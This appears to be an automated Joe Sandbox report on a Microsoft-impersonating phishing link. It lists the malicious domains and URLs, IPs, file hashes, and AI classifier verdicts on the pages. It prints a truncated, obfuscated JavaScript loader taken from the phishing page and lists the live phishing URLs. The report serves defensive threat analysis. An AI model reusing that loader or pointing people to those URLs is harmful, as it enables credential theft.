          https://gth.miconlinestickbu.store/APP-617b5a702a34daddd03071650f95cbe6664e0aa557459/617b5a702a34daddd03071650f95cbe6664e0aa55745b100%Avira URL Cloudphishing
          https://gth.miconlinestickbu.store/x/617b5a702a34daddd03071650f95cbe6664e0aa557460100%Avira URL Cloudphishing
          https://github.com/twbs/bootstrap/blob/master/LICENSE)0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            unknown
            challenges.cloudflare.com
            104.17.3.184
            truefalse
              unknown
              www.google.com
              142.250.185.132
              truefalse
                unknown
                vakspecialisten.store
                172.67.146.167
                truefalse
                  unknown
                  gth.miconlinestickbu.store
                  104.21.21.44
                  truetrue
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      unknown
                      windowsupdatebg.s.llnwi.net
                      87.248.205.0
                      truefalse
                        unknown
                        url12.mailanyone.net
                        unknown
                        unknownfalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760#true
                            unknown
                            https://gth.miconlinestickbu.store/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=887db9822f538c41false
                            • Avira URL Cloud: phishing
                            unknown
                            https://gth.miconlinestickbu.store/cdn-cgi/challenge-platform/h/b/flow/ov1/364841505:1716387000:8tvraBwrX2ERNb1OqE2uDzGzv0lTgOfSzC-a3cgAOkk/887db9822f538c41/18215035ea345dbfalse
                            • Avira URL Cloud: phishing
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=887db996294478e1false
                            • Avira URL Cloud: safe
                            unknown
                            https://gth.miconlinestickbu.store/boot/617b5a702a34daddd03071650f95cbe6664e0aa35f139false
                            • Avira URL Cloud: phishing
                            unknown
                            https://gth.miconlinestickbu.store/1false
                            • Avira URL Cloud: phishing
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67false
                            • Avira URL Cloud: safe
                            unknown
                            https://vakspecialisten.store/noki/x-cp-Ruytfvb6hnx.phpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://gth.miconlinestickbu.store/jq/617b5a702a34daddd03071650f95cbe6664e0aa35f135false
                            • Avira URL Cloud: phishing
                            unknown
                            https://gth.miconlinestickbu.store/true
                              unknown
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/887db996294478e1/1716390545215/fdcd7d549205ee077dcead15de05e39851605c03eb2db3a456277fbb95e594a1/I2uC-N-gD_nQrj8false
                              • Avira URL Cloud: safe
                              unknown
                              https://gth.miconlinestickbu.store/ASSETS/img/sig-op.svgfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760true
                                unknown
                                https://gth.miconlinestickbu.store/js/617b5a702a34daddd03071650f95cbe6664e0aa35f13afalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://gth.miconlinestickbu.store/favicon.icofalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://a.nel.cloudflare.com/report/v4?s=qVRIKX92qaRfJ6gaBUntmAPdh1Gwu3PvCRc3bNwsPhnTsilQ5DZU4Um%2B7FhcPbmw5rS%2FuybWvO1YxIIbCiiaJDTmsIr9eqHJy%2FRBl67sy9FO5QyJv%2Bk9%2FbuWnA4%2BsCQk4oY9veVPX4QDP0cfbw%3D%3Dfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://a.nel.cloudflare.com/report/v4?s=CrtbplJ7Ts50Ffwf6vozefv3cO5hcbSp1dY35h%2B1vnVp8C%2BTOBbW0Hu3WR10kmnw3cxMfskrN3XrfVP91I%2FAsF97vlawby2SsmBs8QbOgeKWURONYgE%2BZDfEhjfU5xxw4ZAg0%2FV9VVJipSh0rg%3D%3Dfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/887db996294478e1/1716390545214/yhIQ4Kim04yJILufalse
                                • Avira URL Cloud: safe
                                unknown
                                https://gth.miconlinestickbu.store/ASSETS/img/m_.svgfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://gth.miconlinestickbu.store/o/617b5a702a34daddd03071650f95cbe6664e0aa557579false
                                • Avira URL Cloud: phishing
                                unknown
                                https://a.nel.cloudflare.com/report/v4?s=0IwYs16BqjdC9UTsglWvKBt1Ntc568lsx9VkFcXyxBxndNRCRQhgf9nhelPmj764DdU0LaKE2Vk0WDve7hL6KRFFs9X9xEmplyk1PBZNDyDoxKbI5hNUkpBA%2BhKbk2LZQH9kJA6jtQtpNY1gyg%3D%3Dfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5psstrue
                                  unknown
                                  https://gth.miconlinestickbu.store/x/617b5a702a34daddd03071650f95cbe6664e0aa557460false
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://gth.miconlinestickbu.store/APP-617b5a702a34daddd03071650f95cbe6664e0aa557459/617b5a702a34daddd03071650f95cbe6664e0aa55745bfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normalfalse
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://getbootstrap.com/)chromecache_80.2.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://github.com/twbs/bootstrap/graphs/contributors)chromecache_80.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_80.2.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.21.21.44
                                    gth.miconlinestickbu.storeUnited States
                                    13335CLOUDFLARENETUStrue
                                    172.67.146.167
                                    vakspecialisten.storeUnited States
                                    13335CLOUDFLARENETUSfalse
                                    142.250.185.132
                                    www.google.comUnited States
                                    15169GOOGLEUSfalse
                                    104.17.3.184
                                    challenges.cloudflare.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    239.255.255.250
                                    unknownReserved
                                    unknownunknownfalse
                                    35.190.80.1
                                    a.nel.cloudflare.comUnited States
                                    15169GOOGLEUSfalse
                                    104.17.2.184
                                    unknownUnited States
                                    13335CLOUDFLARENETUSfalse
                                    IP
                                    192.168.2.4
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1445850
                                    Start date and time:2024-05-22 17:07:42 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 3m 46s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:browseurl.jbs
                                    Sample URL:https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5pss
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:8
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal88.phis.troj.win@21/58@24/8
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.186.46, 108.177.15.84, 34.104.35.123, 104.18.10.14, 104.18.11.14, 40.127.169.103, 87.248.205.0, 192.229.221.95, 20.242.39.171, 20.3.187.198, 142.250.181.234, 216.58.212.170, 172.217.18.10, 142.250.74.202, 216.58.206.74, 142.250.185.74, 142.250.186.74, 216.58.206.42, 142.250.185.138, 142.250.185.106, 142.250.186.42, 142.250.185.234, 216.58.212.138, 142.250.184.234, 142.250.185.202, 142.250.185.170, 142.250.184.195
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, url12.mailanyone.net.cdn.cloudflare.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • VT rate limit hit for: https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5pss
                                    No simulations
                                    InputOutput
                                    URL: https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4T Model: Perplexity: mixtral-8x7b-instruct
                                    {
                                    "loginform": false,
                                    "reasons": [
                                    "No input fields for username or password were found in the text.",
                                    "No submit button was found in the text."
                                    ]
                                    }
                                    Scanning link for threats... e Verifying link Verifying content Expanding link Extracting page features Connecting to server Verifying features Loading page Scan complete URL Protection helps prevent you from inadvertently accessing websites that may damage your computer or attempt to steal your private data. VIPRE EMAIL SECURITY 
                                    URL: https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4T Model: Perplexity: mixtral-8x7b-instruct
                                    {
                                    "loginform": false,
                                    "reasons": [
                                    "The text does not contain any form fields for a username or password.",
                                    "There is no 'Login' or 'Submit' button in the text.",
                                    "The text is actually about URL protection and VIPRE Email Security."
                                    ]
                                    }
                                    Scanning link for threats... e Verifying link Verifying content e Expanding link Extracting page features Connecting to server Verifying features Loading page Scan complete URL Protection helps prevent you from inadvertently accessing websites that may damage your computer or attempt to steal your private data. VIPRE EMAIL SECURITY 
                                    URL: https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s= Model: gpt-4o
                                    ```json
                                    {
                                      "riskscore": 2,
                                      "reasons": "The provided JavaScript code appears to be a part of a module loader or bundler, such as Webpack. It handles dynamic loading of CSS and JavaScript chunks, error handling, and module caching. This is common in modern web applications to optimize loading times and manage dependencies. There are no immediate signs of malicious behavior such as data exfiltration, credential harvesting, or unauthorized access attempts. However, without the full context of the application and additional code, a definitive conclusion cannot be made. The risk score is low but not zero due to the inherent complexity and potential for misuse in dynamic script loading."
                                    }
                                    !function(e){function t(t){for(var n,o,c=t[0],i=t[1],l=t[2],f=0,p=[];f<c.length;f++)o=c[f],Object.prototype.hasOwnProperty.call(a,o)&&a[o]&&p.push(a[o][0]),a[o]=0;for(n in i)Object.prototype.hasOwnProperty.call(i,n)&&(e[n]=i[n]);for(s&&s(t);p.length;)p.shift()();return u.push.apply(u,l||[]),r()}function r(){for(var e,t=0;t<u.length;t++){for(var r=u[t],n=!0,o=1;o<r.length;o++){var i=r[o];0!==a[i]&&(n=!1)}n&&(u.splice(t--,1),e=c(c.s=r[0]))}return e}var n={},o={1:0},a={1:0},u=[];function c(t){if(n[t])return n[t].exports;var r=n[t]={i:t,l:!1,exports:{}};return e[t].call(r.exports,r,r.exports,c),r.l=!0,r.exports}c.e=function(e){var t=[];o[e]?t.push(o[e]):0!==o[e]&&{4:1}[e]&&t.push(o[e]=new Promise((function(t,r){for(var n="static/css/"+({}[e]||e)+"."+{3:"31d6cfe0",4:"6f882ee5",5:"31d6cfe0",6:"31d6cfe0",7:"31d6cfe0",8:"31d6cfe0",9:"31d6cfe0"}[e]+".chunk.css",a=c.p+n,u=document.getElementsByTagName("link"),i=0;i<u.length;i++){var l=(s=u[i]).getAttribute("data-href")||s.getAttribute("href");if("stylesheet"===s.rel&&(l===n||l===a))return t()}var f=document.getElementsByTagName("style");for(i=0;i<f.length;i++){var s;if((l=(s=f[i]).getAttribute("data-href"))===n||l===a)return t()}var p=document.createElement("link");p.rel="stylesheet",p.type="text/css",p.onload=t,p.onerror=function(t){var n=t&&t.target&&t.target.src||a,u=new Error("Loading CSS chunk "+e+" failed.\n("+n+")");u.code="CSS_CHUNK_LOAD_FAILED",u.request=n,delete o[e],p.parentNode.removeChild(p),r(u)},p.href=a,document.getElementsByTagName("head")[0].appendChild(p)})).then((function(){o[e]=0})));var r=a[e];if(0!==r)if(r)t.push(r[2]);else{var n=new Promise((function(t,n){r=a[e]=[t,n]}));t.push(r[2]=n);var u,i=document.createElement("script");i.charset="utf-8",i.timeout=120,c.nc&&i.setAttribute("nonce",c.nc),i.src=function(e){return c.p+"static/js/"+({}[e]||e)+"."+{3:"51e54426",4:"2245794f",5:"b8aa67db",6:"ac631310",7:"39b294be",8:"466c04c3",9:"42bfd7e3"}[e]+".chunk.js"}(e);var l=new Error;u=function(t){i.onerror=i.onload=null,clearTimeout(f);var r=a[e];if(0!==r){if(r){var n=t&&("load"===t.type?"missing":t.type),o=t&&t.target&&t.target.src;l.message="Loading chunk "+e+" failed.\n("+n+": "+o+")",l.name="ChunkLoadError",l.type=n,l.request=o,r[1](l)}a[e]=void 0}};var f=setTimeout((function(){u({type:"timeout",target:i})}),12e4);i.onerror=i.onload=u,document.head.appendChild(i)}return Promise.all(t)},c.m=e,c.c=n,c.d=function(e,t,r){c.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},c.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},c.t=function(e,t){if(1&t&&(e=c(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(c.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var n in e)c.d(r,n,function(t){return e[t]}.bind(null,n));return r},c.n=function(e){var t=e&&e.__esModule?function(){return
                                    URL: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760 Model: gpt-4o
                                    ```json
                                    {
                                      "riskscore": 9,
                                      "reasons": "The provided JavaScript code exhibits several characteristics commonly associated with malicious behavior: 1) It uses obfuscation techniques, making it difficult to understand the code's true purpose. 2) It includes functions that dynamically execute code, which can be used to inject and run arbitrary scripts. 3) It manipulates the DOM in ways that could be used to alter webpage content or steal user information. These factors collectively indicate a high risk of the code being malicious."
                                    }
                                    function r(V,f){var e=I();return r=function(k,F){k=k-0x140;var G=e[k];return G;},r(V,f);}var A=r;(function(q,T){var K=r,S=q();while(!![]){try{var X=-parseInt(K('0x167'))/0x1*(parseInt(K(0x172))/0x2)+parseInt(K('0x148'))/0x3+parseInt(K(0x181))/0x4+-parseInt(K('0x15e'))/0x5+-parseInt(K('0x15f'))/0x6+parseInt(K('0x143'))/0x7+parseInt(K(0x15b))/0x8*(parseInt(K('0x180'))/0x9);if(X===T)break;else S['push'](S['shift']());}catch(y){S['push'](S['shift']());}}}(I,0x6def1));var G=(function(){var q=!![];return function(T,S){var X=q?function(){var t=r;if(S){var y=S[t('0x14d')](T,arguments);return S=null,y;}}:function(){};return q=![],X;};}()),F=G(this,function(){var H=r;return F[H('0x15d')]()[H(0x174)](H('0x184'))[H('0x15d')]()[H(0x14c)](F)[H(0x174)](H(0x184));});F();var k=(function(){var q=!![];return function(T,S){var X=q?function(){var v=r;if(S){var y=S[v('0x14d')](T,arguments);return S=null,y;}}:function(){};return q=![],X;};}());(function(){var l=r,q;try{var T=Function(l(0x16e)+l('0x141')+');');q=T();}catch(S){q=window;}q[l(0x168)](e,0x2710);}()),(function(){k(this,function(){var b=r,q=new RegExp(b('0x145')),T=new RegExp(b('0x160'),'i'),S=e(b(0x176));!q[b(0x17c)](S+b('0x171'))||!T[b(0x17c)](S+b('0x16b'))?S('0'):e();})();}());var f=(function(){var q=!![];return function(T,S){var X=q?function(){var P=r;if(S){var y=S[P(0x14d)](T,arguments);return S=null,y;}}:function(){};return q=![],X;};}()),V=f(this,function(){var m=r,q=function(){var d=r,u;try{u=Function(d('0x16e')+d('0x141')+');')();}catch(o){u=window;}return u;},T=q(),S=T[m(0x17b)]=T[m('0x17b')]||{},X=[m('0x147'),m(0x158),m('0x185'),m('0x17e'),m('0x156'),m('0x166'),m(0x186)];for(var y=0x0;y<X[m(0x155)];y++){var W=f[m('0x14c')][m(0x140)][m(0x16f)](f),E=X[y],n=S[E]||W;W[m('0x149')]=f[m('0x16f')](f),W[m(0x15d)]=n[m(0x15d)][m('0x16f')](n),S[E]=W;}});V();var xhttp=new XMLHttpRequest();function I(){var g=['bind','link','chain','2qnFsTw','responseText','search','./1','init','rel','action','createElement','title','console','test','endsWith','error','call','9PywHmQ','1299336qyVKkJ','send','body','(((.+)+)+)+$','info','trace','prototype','{}.constructor(\x22return\x20this\x22)(\x20)','head','2710652hMQFCG','gger','function\x20*\x5c(\x20*\x5c)','getAttribute','log','414663HNHDks','__proto__','counter','innerHTML','constructor','apply','setAttribute','stateObject','.css','readyState','GET','text','status','length','exception','script','warn','src','href','5185064ZTWgbk','appendChild','toString','3422815sEhBVC','163698LoiBOy','\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)','open','div','debu','onreadystatechange','push','table','336289CsTvoK','setInterval','while\x20(true)\x20{}','string','input','stylesheet','getElementsByTagName','return\x20(function()\x20'];I=function(){return g;};return I();}xhttp[A('0x164')]=function(){var c=A;if(this[c(0x151)]==0x4&&this[c('0x154')]==0xc8){var q=this[c(0x173)],T=document[c('0x179')](c(0x162));T[c('0x14b')]=q;var S=T[c(0x16d)](c('0x157'));document[c('0x17a')]=T[c('0x16d')](c('0x
                                    URL: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760 Model: gpt-4o
                                    ```json
                                    {
                                      "phishing_score": 9,
                                      "brands": "Microsoft",
                                      "phishing": true,
                                      "suspicious_domain": true,
                                      "has_loginform": true,
                                      "has_captcha": false,
                                      "setechniques": true,
                                      "reasons": "The URL 'https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760' is highly suspicious as it does not match the legitimate domain name associated with Microsoft, which is typically 'microsoft.com' or 'live.com'. The presence of a login form on a suspicious domain is a common phishing tactic. The URL and the use of social engineering techniques (mimicking a legitimate Microsoft login page) strongly indicate that this is a phishing site."
                                    }
                                    No context
                                    No context
                                    No context
                                    No context
                                    No context
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                    Category:downloaded
                                    Size (bytes):61
                                    Entropy (8bit):3.990210155325004
                                    Encrypted:false
                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                    Malicious:false
                                    Reputation:low
                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text
                                    Category:downloaded
                                    Size (bytes):315
                                    Entropy (8bit):5.0572271090563765
                                    Encrypted:false
                                    SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                    MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                    SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                    SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                    SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                    Malicious:false
                                    Reputation:low
                                    URL:https://gth.miconlinestickbu.store/favicon.ico
                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (8127)
                                    Category:downloaded
                                    Size (bytes):8176
                                    Entropy (8bit):5.354303077210023
                                    Encrypted:false
                                    SSDEEP:48:06ljerKZ8o6Z9ODdsd8HX02I2pNp7CpXLxJBEsE4LJTENV0sLR5NnjFARezY5+xH:0Df5dBE2gftF3YoCEXOVIsgAY
                                    MD5:131871CE596EE77AA51129C134336F00
                                    SHA1:9BE571424EA29C4EA834981098C3924B6C19453A
                                    SHA-256:92C546D42EA275C73117FA125AF64A342BAC8E0E921EC11280861D905719BEB8
                                    SHA-512:C60FBC5BB31A6ACAD2FDFF5BC366E83FC772493B43B49A4A9AA4F4AF213673BB0F04781134A6ACDF11456DF6841A705DCCD5FB0979A94F7E75C09A89D487EBE5
                                    Malicious:false
                                    Reputation:low
                                    URL:https://url12.mailanyone.net/static/css/4.6f882ee5.chunk.css
                                    Preview:.FloatingCircle_FloatingCircleContainer__13Pwx{height:0}.FloatingCircle_FloatingCircle__1mZQc,.FloatingCircle_FloatingCircleContainer__13Pwx{display:-webkit-flex;display:flex;-webkit-justify-content:center;justify-content:center}.FloatingCircle_FloatingCircle__1mZQc{position:relative;overflow:hidden;border-radius:50%;box-shadow:0 3px 6px rgba(0,0,0,.161);z-index:1}.FloatingCircle_FloatingCircle__MD__3w-8L{top:-2.333rem;height:4.666rem;width:4.666rem}.FloatingCircle_FloatingCircle__LG__2ewqP{top:-3rem;height:6rem;width:6rem}.FloatingCircle_FloatingCircle__Icon__3stnW{display:-webkit-flex;display:flex;-webkit-align-items:center;align-items:center}.FloatingCircle_FloatingCircle__Icon__MD__2UABm{font-size:2.333rem}.FloatingCircle_FloatingCircle__Icon__LG__3JGnf{font-size:3rem}.FloatingCircle_FloatingCircleDanger__3anuh{background-color:#f2d9d3}.FloatingCircle_FloatingCircleDanger__3anuh .FloatingCircle_FloatingCircle__Icon__3stnW{color:#ba2d0c}.FloatingCircle_FloatingCircleWarning__3JlQ0{b
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (42526)
                                    Category:downloaded
                                    Size (bytes):42527
                                    Entropy (8bit):5.373234803143812
                                    Encrypted:false
                                    SSDEEP:768:NCoLEBOnQowmmxCsbE95NdDid29P4DY88fvO959F1DQ+aohLyKoS4Hnla5KX5:qWQowHxCsQ919P0959vk
                                    MD5:C667700BE084108F8DEDED9026FFBBF9
                                    SHA1:31D633A11EF13A66787EC6504E38C11842664B7B
                                    SHA-256:E158035A6F740B0245A027BF0D559C56782EBBEEC7CAB5A827083BD16AA47901
                                    SHA-512:9EEA0C81A4D7E7ED7EE7F30A53B5AA93C356129D9850AE978A6D408F0B1337F3E9FCEDE25C996DCA3A2AC9840B86B4D821CD0A9DFFCF8BC427A730F420F33891
                                    Malicious:false
                                    Reputation:low
                                    URL:https://challenges.cloudflare.com/turnstile/v0/b/695da7821231/api.js?onload=gayxv3&render=explicit
                                    Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(s){r(s);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function dr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 83 x 22, 8-bit/color RGB, non-interlaced
                                    Category:downloaded
                                    Size (bytes):61
                                    Entropy (8bit):4.035372245524405
                                    Encrypted:false
                                    SSDEEP:3:yionv//thPlSRtKhBxl/k4E08up:6v/lhPkmhB7Tp
                                    MD5:B5F0F5E60A49DDC157538FBED76751D3
                                    SHA1:5CFDFF071C8B382F185B2E48D9A6B11F071C81CC
                                    SHA-256:FFFC75DC8EB914F0D43C2DC509D89F45A49844B21C60E7049A2A955F4C2B703B
                                    SHA-512:A5306E105B4FEE0D5A50D97E2777A99BF4FCE2046A775F6C94E90508ED4F64590B700A786F5F17ABD079BA21D51BF4305C7F270D84375F516B1CEA8C19060901
                                    Malicious:false
                                    Reputation:low
                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/887db996294478e1/1716390545214/yhIQ4Kim04yJILu
                                    Preview:.PNG........IHDR...S.........3E7.....IDAT.....$.....IEND.B`.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):1592
                                    Entropy (8bit):4.205005284721148
                                    Encrypted:false
                                    SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                    MD5:4E48046CE74F4B89D45037C90576BFAC
                                    SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
